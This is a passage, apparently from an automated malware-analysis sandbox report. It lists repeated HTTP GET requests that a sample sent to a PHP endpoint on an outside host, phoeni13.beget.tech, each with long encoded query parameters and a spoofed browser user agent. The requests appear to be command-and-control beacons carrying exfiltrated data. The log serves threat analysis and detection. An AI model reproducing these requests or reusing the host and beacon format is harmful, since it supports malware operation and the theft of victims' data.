BpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTUq9kMRp2T1UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: 